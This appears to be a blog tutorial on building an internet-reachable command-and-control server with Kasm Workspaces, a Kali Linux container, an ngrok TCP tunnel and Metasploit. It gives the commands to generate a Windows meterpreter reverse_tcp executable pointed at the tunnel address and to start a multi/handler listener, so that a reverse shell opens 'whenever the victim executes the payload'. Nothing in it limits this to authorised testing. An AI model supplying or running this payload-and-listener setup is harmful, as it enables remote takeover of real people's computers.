In this article, I will walk you through setting up your Command and Control Server using Metasploit and Kasm Workspaces.
Metasploit is a penetration testing framework that contains a payload generator, many modules to enumerate and exploit different known vulnerabilities on different targets. It can also be used as a Command and Control (C&C) server by managing target sessions, maintain persistence, perform post exploitation, etc., It is a must-have tool in any hacker's toolkit.
Kasm is a docker container streaming platform which enables you to run private sessions of docker apps and use them directly from your web browser. It supports many awesome features like session casting, ability to destroy/pause/resume sessions and so on. You can keep your docker apps organized and at one place to be readily usable with the help of Kasm.
We will first setup a Kali Linux hacking lab in Kasm workspaces and then use the pre-installed Metasploit framework from the Kali Linux container.
Install Kasm
Kasm can be installed on any Linux machine with at least 2 CPU cores, 4 GB memory and 50GB SSD storage. I like to install Kasm on a cloud instance because I want my C&C server to be always available and online. However, you can install Kasm on your local Linux machine as well. The official installation guide for Kasm is here: https://kasmweb.com/docs/latest/index.html
Just run these five simple commands to install Kasm:
# Go to /tmp
cd /tmp
# Download Kasm
curl -O https://kasm-static-content.s3.amazonaws.com/kasm_release_1.14.0.3a7abb.tar.gz
# Extract
tar -xf kasm_release_1.14.0.3a7abb.tar.gz
# Install Kasm
sudo bash kasm_release/install.sh
Great! Now that you have Kasm installed, you can login to your dashboard by going to https://<YOUR_IP>
You can login with the default credentials that were displayed on the terminal when Kasm is done installing.
Install Kali Linux
Kali Linux is a Linux distribution designed for digital forensics and penetration testing. It comes with Metasploit pre-installed.
From your dashboard, go to Workspaces -> Add from Registry and install Kali Linux from the list of available docker images.
Once Kali is installed, go back to Workspaces and open a new session.
That's it! You now have a Kali Linux session.
Setup tunneling
Since you are using Kali Linux as a docker container - you will not be able to receive inbound connections from the internet. However, it is very important for your C&C server to be available on the Internet to receive connections from the targets. To fix this, you can use ngrok to create a secure tunnel from the Internet to your local network interface.
Go to ngrok.com, create an account and download ngrok
On the download page, you will also find the command to activate your ngrok tool with your unique auth token - simply copy and paste it on your terminal to authenticate.
Now, use the following command to setup a tunnel:
./ngrok tcp 1560
This will create a tunnel from the ngrok servers (which are accessible from the Internet) to your localhost on port 1560. Feel free to use whatever port you like.
This will generate an ngrok address (6.tcp.ngrok.io) in my case and a unique port (17800) in my case.
You can use this address and port whenever you are creating a payload. For example, let me create a payload with msfvenom for a windows target with the command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=17800 -f exe > payload.exe
Notice how I used my ngrok address for the LHOST and my unique ngrok port for the LPORT. When a connection is received on this address and port, ngrok forwards it to my localhost on port 1560.
Now, to setup the listener - I will just open my Metasploit console with the msfconsole command and use exploit/multi/handler - then set the payload to the same (windows/x64/meterpreter/reverse_tcp)
I will then set the LHOST to localhost and LPORT to 1560 because this is where the connections from the Internet will be forwarded to by ngrok.
That's it! I will now simply type run and my listener is online. Now, whenever the victim executes the payload, I get a reverse shell on my msfconsole!
And just like that we are able to setup a C&C server on the cloud with the help of Kasm Workspaces and Metasploit!
Comments